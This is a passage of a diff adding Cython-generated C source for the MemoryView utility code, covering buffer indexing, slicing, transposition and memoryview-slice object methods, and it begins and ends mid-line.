not is_slice: + * if new_ndim == 0: + * dst.data = ( dst.data)[0] + suboffset # <<<<<<<<<<<<<< + * else: + * _err_dim(PyExc_IndexError, "All dimensions preceding dimension %d " + */ + __pyx_v_dst->data = ((((char **)__pyx_v_dst->data)[0]) + __pyx_v_suboffset); + + /* "View.MemoryView":882 + * if suboffset >= 0: + * if not is_slice: + * if new_ndim == 0: # <<<<<<<<<<<<<< + * dst.data = ( dst.data)[0] + suboffset + * else: + */ + goto __pyx_L22; + } + + /* "View.MemoryView":885 + * dst.data = ( dst.data)[0] + suboffset + * else: + * _err_dim(PyExc_IndexError, "All dimensions preceding dimension %d " # <<<<<<<<<<<<<< + * "must be indexed and not sliced", dim) + * else: + */ + /*else*/ { + + /* "View.MemoryView":886 + * else: + * _err_dim(PyExc_IndexError, "All dimensions preceding dimension %d " + * "must be indexed and not sliced", dim) # <<<<<<<<<<<<<< + * else: + * suboffset_dim[0] = new_ndim + */ + __pyx_t_3 = __pyx_memoryview_err_dim(PyExc_IndexError, __pyx_kp_s_All_dimensions_preceding_dimensi, __pyx_v_dim); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 885, __pyx_L1_error) + } + __pyx_L22:; + + /* "View.MemoryView":881 + * + * if suboffset >= 0: + * if not is_slice: # <<<<<<<<<<<<<< + * if new_ndim == 0: + * dst.data = ( dst.data)[0] + suboffset + */ + goto __pyx_L21; + } + + /* "View.MemoryView":888 + * "must be indexed and not sliced", dim) + * else: + * suboffset_dim[0] = new_ndim # <<<<<<<<<<<<<< + * + * return 0 + */ + /*else*/ { + (__pyx_v_suboffset_dim[0]) = __pyx_v_new_ndim; + } + __pyx_L21:; + + /* "View.MemoryView":880 + * dst.suboffsets[suboffset_dim[0]] += start * stride + * + * if suboffset >= 0: # <<<<<<<<<<<<<< + * if not is_slice: + * if new_ndim == 0: + */ + } + + /* "View.MemoryView":890 + * suboffset_dim[0] = new_ndim + * + * return 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":793 + * + * @cname('__pyx_memoryview_slice_memviewslice') + * cdef int slice_memviewslice( # <<<<<<<<<<<<<< + * __Pyx_memviewslice *dst, + * Py_ssize_t shape, Py_ssize_t stride, Py_ssize_t suboffset, + */ + + /* function exit code */ + __pyx_L1_error:; + #ifdef WITH_THREAD + __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_AddTraceback("View.MemoryView.slice_memviewslice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":896 + * + * @cname('__pyx_pybuffer_index') + * cdef char *pybuffer_index(Py_buffer *view, char *bufp, Py_ssize_t index, # <<<<<<<<<<<<<< + * Py_ssize_t dim) except NULL: + * cdef Py_ssize_t shape, stride, suboffset = -1 + */ + +static char *__pyx_pybuffer_index(Py_buffer *__pyx_v_view, char *__pyx_v_bufp, Py_ssize_t __pyx_v_index, Py_ssize_t __pyx_v_dim) { + Py_ssize_t __pyx_v_shape; + Py_ssize_t __pyx_v_stride; + Py_ssize_t __pyx_v_suboffset; + Py_ssize_t __pyx_v_itemsize; + char *__pyx_v_resultp; + char *__pyx_r; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + Py_UCS4 __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("pybuffer_index", 0); + + /* "View.MemoryView":898 + * cdef char *pybuffer_index(Py_buffer *view, char *bufp, Py_ssize_t index, + * Py_ssize_t dim) except NULL: + * cdef Py_ssize_t shape, stride, suboffset = -1 # <<<<<<<<<<<<<< + * cdef Py_ssize_t itemsize = view.itemsize + * cdef char *resultp + */ + __pyx_v_suboffset = -1L; + + /* "View.MemoryView":899 + * Py_ssize_t dim) except NULL: + * cdef Py_ssize_t shape, stride, suboffset = -1 + * cdef Py_ssize_t itemsize = view.itemsize # <<<<<<<<<<<<<< + * cdef char *resultp + * + */ + __pyx_t_1 = __pyx_v_view->itemsize; + __pyx_v_itemsize = __pyx_t_1; + + /* "View.MemoryView":902 + * cdef char *resultp + * + * if view.ndim == 0: # <<<<<<<<<<<<<< + * shape = view.len // itemsize + * stride = itemsize + */ + __pyx_t_2 = (__pyx_v_view->ndim == 0); + if (__pyx_t_2) { + + /* "View.MemoryView":903 + * + * if view.ndim == 0: + * shape = view.len // itemsize # <<<<<<<<<<<<<< + * stride = itemsize + * else: + */ + if (unlikely(__pyx_v_itemsize == 0)) { + PyErr_SetString(PyExc_ZeroDivisionError, "integer division or modulo by zero"); + __PYX_ERR(1, 903, __pyx_L1_error) + } + else if (sizeof(Py_ssize_t) == sizeof(long) && (!(((Py_ssize_t)-1) > 0)) && unlikely(__pyx_v_itemsize == (Py_ssize_t)-1) && unlikely(__Pyx_UNARY_NEG_WOULD_OVERFLOW(__pyx_v_view->len))) { + PyErr_SetString(PyExc_OverflowError, "value too large to perform division"); + __PYX_ERR(1, 903, __pyx_L1_error) + } + __pyx_v_shape = __Pyx_div_Py_ssize_t(__pyx_v_view->len, __pyx_v_itemsize); + + /* "View.MemoryView":904 + * if view.ndim == 0: + * shape = view.len // itemsize + * stride = itemsize # <<<<<<<<<<<<<< + * else: + * shape = view.shape[dim] + */ + __pyx_v_stride = __pyx_v_itemsize; + + /* "View.MemoryView":902 + * cdef char *resultp + * + * if view.ndim == 0: # <<<<<<<<<<<<<< + * shape = view.len // itemsize + * stride = itemsize + */ + goto __pyx_L3; + } + + /* "View.MemoryView":906 + * stride = itemsize + * else: + * shape = view.shape[dim] # <<<<<<<<<<<<<< + * stride = view.strides[dim] + * if view.suboffsets != NULL: + */ + /*else*/ { + __pyx_v_shape = (__pyx_v_view->shape[__pyx_v_dim]); + + /* "View.MemoryView":907 + * else: + * shape = view.shape[dim] + * stride = view.strides[dim] # <<<<<<<<<<<<<< + * if view.suboffsets != NULL: + * suboffset = view.suboffsets[dim] + */ + __pyx_v_stride = (__pyx_v_view->strides[__pyx_v_dim]); + + /* "View.MemoryView":908 + * shape = view.shape[dim] + * stride = view.strides[dim] + * if view.suboffsets != NULL: # <<<<<<<<<<<<<< + * suboffset = view.suboffsets[dim] + * + */ + __pyx_t_2 = (__pyx_v_view->suboffsets != NULL); + if (__pyx_t_2) { + + /* "View.MemoryView":909 + * stride = view.strides[dim] + * if view.suboffsets != NULL: + * suboffset = view.suboffsets[dim] # <<<<<<<<<<<<<< + * + * if index < 0: + */ + __pyx_v_suboffset = (__pyx_v_view->suboffsets[__pyx_v_dim]); + + /* "View.MemoryView":908 + * shape = view.shape[dim] + * stride = view.strides[dim] + * if view.suboffsets != NULL: # <<<<<<<<<<<<<< + * suboffset = view.suboffsets[dim] + * + */ + } + } + __pyx_L3:; + + /* "View.MemoryView":911 + * suboffset = view.suboffsets[dim] + * + * if index < 0: # <<<<<<<<<<<<<< + * index += view.shape[dim] + * if index < 0: + */ + __pyx_t_2 = (__pyx_v_index < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":912 + * + * if index < 0: + * index += view.shape[dim] # <<<<<<<<<<<<<< + * if index < 0: + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + */ + __pyx_v_index = (__pyx_v_index + (__pyx_v_view->shape[__pyx_v_dim])); + + /* "View.MemoryView":913 + * if index < 0: + * index += view.shape[dim] + * if index < 0: # <<<<<<<<<<<<<< + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + */ + __pyx_t_2 = (__pyx_v_index < 0); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":914 + * index += view.shape[dim] + * if index < 0: + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" # <<<<<<<<<<<<<< + * + * if index >= shape: + */ + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 914, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = 0; + __pyx_t_4 = 127; + __Pyx_INCREF(__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + __pyx_t_1 += 37; + __Pyx_GIVEREF(__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_kp_u_Out_of_bounds_on_buffer_access_a); + __pyx_t_5 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_dim, 0, ' ', 'd'); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 914, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_5); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_5); + __pyx_t_5 = 0; + __Pyx_INCREF(__pyx_kp_u__7); + __pyx_t_1 += 1; + __Pyx_GIVEREF(__pyx_kp_u__7); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_kp_u__7); + __pyx_t_5 = __Pyx_PyUnicode_Join(__pyx_t_3, 3, __pyx_t_1, __pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 914, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_builtin_IndexError, __pyx_t_5, 0, 0); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __PYX_ERR(1, 914, __pyx_L1_error) + + /* "View.MemoryView":913 + * if index < 0: + * index += view.shape[dim] + * if index < 0: # <<<<<<<<<<<<<< + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + */ + } + + /* "View.MemoryView":911 + * suboffset = view.suboffsets[dim] + * + * if index < 0: # <<<<<<<<<<<<<< + * index += view.shape[dim] + * if index < 0: + */ + } + + /* "View.MemoryView":916 + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + * if index >= shape: # <<<<<<<<<<<<<< + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + */ + __pyx_t_2 = (__pyx_v_index >= __pyx_v_shape); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":917 + * + * if index >= shape: + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" # <<<<<<<<<<<<<< + * + * resultp = bufp + index * stride + */ + __pyx_t_5 = PyTuple_New(3); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 917, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = 0; + __pyx_t_4 = 127; + __Pyx_INCREF(__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + __pyx_t_1 += 37; + __Pyx_GIVEREF(__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_kp_u_Out_of_bounds_on_buffer_access_a); + __pyx_t_3 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_dim, 0, ' ', 'd'); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 917, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_3); + __pyx_t_3 = 0; + __Pyx_INCREF(__pyx_kp_u__7); + __pyx_t_1 += 1; + __Pyx_GIVEREF(__pyx_kp_u__7); + PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_kp_u__7); + __pyx_t_3 = __Pyx_PyUnicode_Join(__pyx_t_5, 3, __pyx_t_1, __pyx_t_4); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 917, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_Raise(__pyx_builtin_IndexError, __pyx_t_3, 0, 0); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __PYX_ERR(1, 917, __pyx_L1_error) + + /* "View.MemoryView":916 + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + * if index >= shape: # <<<<<<<<<<<<<< + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + */ + } + + /* "View.MemoryView":919 + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + * resultp = bufp + index * stride # <<<<<<<<<<<<<< + * if suboffset >= 0: + * resultp = ( resultp)[0] + suboffset + */ + __pyx_v_resultp = (__pyx_v_bufp + (__pyx_v_index * __pyx_v_stride)); + + /* "View.MemoryView":920 + * + * resultp = bufp + index * stride + * if suboffset >= 0: # <<<<<<<<<<<<<< + * resultp = ( resultp)[0] + suboffset + * + */ + __pyx_t_2 = (__pyx_v_suboffset >= 0); + if (__pyx_t_2) { + + /* "View.MemoryView":921 + * resultp = bufp + index * stride + * if suboffset >= 0: + * resultp = ( resultp)[0] + suboffset # <<<<<<<<<<<<<< + * + * return resultp + */ + __pyx_v_resultp = ((((char **)__pyx_v_resultp)[0]) + __pyx_v_suboffset); + + /* "View.MemoryView":920 + * + * resultp = bufp + index * stride + * if suboffset >= 0: # <<<<<<<<<<<<<< + * resultp = ( resultp)[0] + suboffset + * + */ + } + + /* "View.MemoryView":923 + * resultp = ( resultp)[0] + suboffset + * + * return resultp # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = __pyx_v_resultp; + goto __pyx_L0; + + /* "View.MemoryView":896 + * + * @cname('__pyx_pybuffer_index') + * cdef char *pybuffer_index(Py_buffer *view, char *bufp, Py_ssize_t index, # <<<<<<<<<<<<<< + * Py_ssize_t dim) except NULL: + * cdef Py_ssize_t shape, stride, suboffset = -1 + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("View.MemoryView.pybuffer_index", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":929 + * + * @cname('__pyx_memslice_transpose') + * cdef int transpose_memslice(__Pyx_memviewslice *memslice) except -1 nogil: # <<<<<<<<<<<<<< + * cdef int ndim = memslice.memview.view.ndim + * + */ + +static int __pyx_memslice_transpose(__Pyx_memviewslice *__pyx_v_memslice) { + int __pyx_v_ndim; + Py_ssize_t *__pyx_v_shape; + Py_ssize_t *__pyx_v_strides; + int __pyx_v_i; + int __pyx_v_j; + int __pyx_r; + int __pyx_t_1; + Py_ssize_t *__pyx_t_2; + long __pyx_t_3; + long __pyx_t_4; + Py_ssize_t __pyx_t_5; + Py_ssize_t __pyx_t_6; + int __pyx_t_7; + int __pyx_t_8; + int __pyx_t_9; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save; + #endif + + /* "View.MemoryView":930 + * @cname('__pyx_memslice_transpose') + * cdef int transpose_memslice(__Pyx_memviewslice *memslice) except -1 nogil: + * cdef int ndim = memslice.memview.view.ndim # <<<<<<<<<<<<<< + * + * cdef Py_ssize_t *shape = memslice.shape + */ + __pyx_t_1 = __pyx_v_memslice->memview->view.ndim; + __pyx_v_ndim = __pyx_t_1; + + /* "View.MemoryView":932 + * cdef int ndim = memslice.memview.view.ndim + * + * cdef Py_ssize_t *shape = memslice.shape # <<<<<<<<<<<<<< + * cdef Py_ssize_t *strides = memslice.strides + * + */ + __pyx_t_2 = __pyx_v_memslice->shape; + __pyx_v_shape = __pyx_t_2; + + /* "View.MemoryView":933 + * + * cdef Py_ssize_t *shape = memslice.shape + * cdef Py_ssize_t *strides = memslice.strides # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = __pyx_v_memslice->strides; + __pyx_v_strides = __pyx_t_2; + + /* "View.MemoryView":937 + * + * cdef int i, j + * for i in range(ndim // 2): # <<<<<<<<<<<<<< + * j = ndim - 1 - i + * strides[i], strides[j] = strides[j], strides[i] + */ + __pyx_t_3 = __Pyx_div_long(__pyx_v_ndim, 2); + __pyx_t_4 = __pyx_t_3; + for (__pyx_t_1 = 0; __pyx_t_1 < __pyx_t_4; __pyx_t_1+=1) { + __pyx_v_i = __pyx_t_1; + + /* "View.MemoryView":938 + * cdef int i, j + * for i in range(ndim // 2): + * j = ndim - 1 - i # <<<<<<<<<<<<<< + * strides[i], strides[j] = strides[j], strides[i] + * shape[i], shape[j] = shape[j], shape[i] + */ + __pyx_v_j = ((__pyx_v_ndim - 1) - __pyx_v_i); + + /* "View.MemoryView":939 + * for i in range(ndim // 2): + * j = ndim - 1 - i + * strides[i], strides[j] = strides[j], strides[i] # <<<<<<<<<<<<<< + * shape[i], shape[j] = shape[j], shape[i] + * + */ + __pyx_t_5 = (__pyx_v_strides[__pyx_v_j]); + __pyx_t_6 = (__pyx_v_strides[__pyx_v_i]); + (__pyx_v_strides[__pyx_v_i]) = __pyx_t_5; + (__pyx_v_strides[__pyx_v_j]) = __pyx_t_6; + + /* "View.MemoryView":940 + * j = ndim - 1 - i + * strides[i], strides[j] = strides[j], strides[i] + * shape[i], shape[j] = shape[j], shape[i] # <<<<<<<<<<<<<< + * + * if memslice.suboffsets[i] >= 0 or memslice.suboffsets[j] >= 0: + */ + __pyx_t_6 = (__pyx_v_shape[__pyx_v_j]); + __pyx_t_5 = (__pyx_v_shape[__pyx_v_i]); + (__pyx_v_shape[__pyx_v_i]) = __pyx_t_6; + (__pyx_v_shape[__pyx_v_j]) = __pyx_t_5; + + /* "View.MemoryView":942 + * shape[i], shape[j] = shape[j], shape[i] + * + * if memslice.suboffsets[i] >= 0 or memslice.suboffsets[j] >= 0: # <<<<<<<<<<<<<< + * _err(PyExc_ValueError, "Cannot transpose memoryview with indirect dimensions") + * + */ + __pyx_t_8 = ((__pyx_v_memslice->suboffsets[__pyx_v_i]) >= 0); + if (!__pyx_t_8) { + } else { + __pyx_t_7 = __pyx_t_8; + goto __pyx_L6_bool_binop_done; + } + __pyx_t_8 = ((__pyx_v_memslice->suboffsets[__pyx_v_j]) >= 0); + __pyx_t_7 = __pyx_t_8; + __pyx_L6_bool_binop_done:; + if (__pyx_t_7) { + + /* "View.MemoryView":943 + * + * if memslice.suboffsets[i] >= 0 or memslice.suboffsets[j] >= 0: + * _err(PyExc_ValueError, "Cannot transpose memoryview with indirect dimensions") # <<<<<<<<<<<<<< + * + * return 0 + */ + __pyx_t_9 = __pyx_memoryview_err(PyExc_ValueError, __pyx_kp_s_Cannot_transpose_memoryview_with); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(1, 943, __pyx_L1_error) + + /* "View.MemoryView":942 + * shape[i], shape[j] = shape[j], shape[i] + * + * if memslice.suboffsets[i] >= 0 or memslice.suboffsets[j] >= 0: # <<<<<<<<<<<<<< + * _err(PyExc_ValueError, "Cannot transpose memoryview with indirect dimensions") + * + */ + } + } + + /* "View.MemoryView":945 + * _err(PyExc_ValueError, "Cannot transpose memoryview with indirect dimensions") + * + * return 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":929 + * + * @cname('__pyx_memslice_transpose') + * cdef int transpose_memslice(__Pyx_memviewslice *memslice) except -1 nogil: # <<<<<<<<<<<<<< + * cdef int ndim = memslice.memview.view.ndim + * + */ + + /* function exit code */ + __pyx_L1_error:; + #ifdef WITH_THREAD + __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_AddTraceback("View.MemoryView.transpose_memslice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":963 + * cdef int (*to_dtype_func)(char *, object) except 0 + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) + * + */ + +/* Python wrapper */ +static void __pyx_memoryviewslice___dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_memoryviewslice___dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_memoryviewslice___pyx_pf_15View_dot_MemoryView_16_memoryviewslice___dealloc__(((struct __pyx_memoryviewslice_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_memoryviewslice___pyx_pf_15View_dot_MemoryView_16_memoryviewslice___dealloc__(struct __pyx_memoryviewslice_obj *__pyx_v_self) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "View.MemoryView":964 + * + * def __dealloc__(self): + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) # <<<<<<<<<<<<<< + * + * cdef convert_item_to_object(self, char *itemp): + */ + __PYX_XCLEAR_MEMVIEW((&__pyx_v_self->from_slice), 1); + + /* "View.MemoryView":963 + * cdef int (*to_dtype_func)(char *, object) except 0 + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) + * + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":966 + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) + * + * cdef convert_item_to_object(self, char *itemp): # <<<<<<<<<<<<<< + * if self.to_object_func != NULL: + * return self.to_object_func(itemp) + */ + +static PyObject *__pyx_memoryviewslice_convert_item_to_object(struct __pyx_memoryviewslice_obj *__pyx_v_self, char *__pyx_v_itemp) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("convert_item_to_object", 0); + + /* "View.MemoryView":967 + * + * cdef convert_item_to_object(self, char *itemp): + * if self.to_object_func != NULL: # <<<<<<<<<<<<<< + * return self.to_object_func(itemp) + * else: + */ + __pyx_t_1 = (__pyx_v_self->to_object_func != NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":968 + * cdef convert_item_to_object(self, char *itemp): + * if self.to_object_func != NULL: + * return self.to_object_func(itemp) # <<<<<<<<<<<<<< + * else: + * return memoryview.convert_item_to_object(self, itemp) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_v_self->to_object_func(__pyx_v_itemp); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 968, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":967 + * + * cdef convert_item_to_object(self, char *itemp): + * if self.to_object_func != NULL: # <<<<<<<<<<<<<< + * return self.to_object_func(itemp) + * else: + */ + } + + /* "View.MemoryView":970 + * return self.to_object_func(itemp) + * else: + * return memoryview.convert_item_to_object(self, itemp) # <<<<<<<<<<<<<< + * + * cdef assign_item_from_object(self, char *itemp, object value): + */ + /*else*/ { + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_memoryview_convert_item_to_object(((struct __pyx_memoryview_obj *)__pyx_v_self), __pyx_v_itemp); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 970, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + } + + /* "View.MemoryView":966 + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) + * + * cdef convert_item_to_object(self, char *itemp): # <<<<<<<<<<<<<< + * if self.to_object_func != NULL: + * return self.to_object_func(itemp) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.convert_item_to_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":972 + * return memoryview.convert_item_to_object(self, itemp) + * + * cdef assign_item_from_object(self, char *itemp, object value): # <<<<<<<<<<<<<< + * if self.to_dtype_func != NULL: + * self.to_dtype_func(itemp, value) + */ + +static PyObject *__pyx_memoryviewslice_assign_item_from_object(struct __pyx_memoryviewslice_obj *__pyx_v_self, char *__pyx_v_itemp, PyObject *__pyx_v_value) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("assign_item_from_object", 0); + + /* "View.MemoryView":973 + * + * cdef assign_item_from_object(self, char *itemp, object value): + * if self.to_dtype_func != NULL: # <<<<<<<<<<<<<< + * self.to_dtype_func(itemp, value) + * else: + */ + __pyx_t_1 = (__pyx_v_self->to_dtype_func != NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":974 + * cdef assign_item_from_object(self, char *itemp, object value): + * if self.to_dtype_func != NULL: + * self.to_dtype_func(itemp, value) # <<<<<<<<<<<<<< + * else: + * memoryview.assign_item_from_object(self, itemp, value) + */ + __pyx_t_2 = __pyx_v_self->to_dtype_func(__pyx_v_itemp, __pyx_v_value); if (unlikely(__pyx_t_2 == ((int)0))) __PYX_ERR(1, 974, __pyx_L1_error) + + /* "View.MemoryView":973 + * + * cdef assign_item_from_object(self, char *itemp, object value): + * if self.to_dtype_func != NULL: # <<<<<<<<<<<<<< + * self.to_dtype_func(itemp, value) + * else: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":976 + * self.to_dtype_func(itemp, value) + * else: + * memoryview.assign_item_from_object(self, itemp, value) # <<<<<<<<<<<<<< + * + * cdef _get_base(self): + */ + /*else*/ { + __pyx_t_3 = __pyx_memoryview_assign_item_from_object(((struct __pyx_memoryview_obj *)__pyx_v_self), __pyx_v_itemp, __pyx_v_value); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 976, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_L3:; + + /* "View.MemoryView":972 + * return memoryview.convert_item_to_object(self, itemp) + * + * cdef assign_item_from_object(self, char *itemp, object value): # <<<<<<<<<<<<<< + * if self.to_dtype_func != NULL: + * self.to_dtype_func(itemp, value) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.assign_item_from_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":978 + * memoryview.assign_item_from_object(self, itemp, value) + * + * cdef _get_base(self): # <<<<<<<<<<<<<< + * return self.from_object + * + */ + +static PyObject *__pyx_memoryviewslice__get_base(struct __pyx_memoryviewslice_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_get_base", 0); + + /* "View.MemoryView":979 + * + * cdef _get_base(self): + * return self.from_object # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->from_object); + __pyx_r = __pyx_v_self->from_object; + goto __pyx_L0; + + /* "View.MemoryView":978 + * memoryview.assign_item_from_object(self, itemp, value) + * + * cdef _get_base(self): # <<<<<<<<<<<<<< + * return self.from_object + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_memoryviewslice_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_memoryviewslice_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if 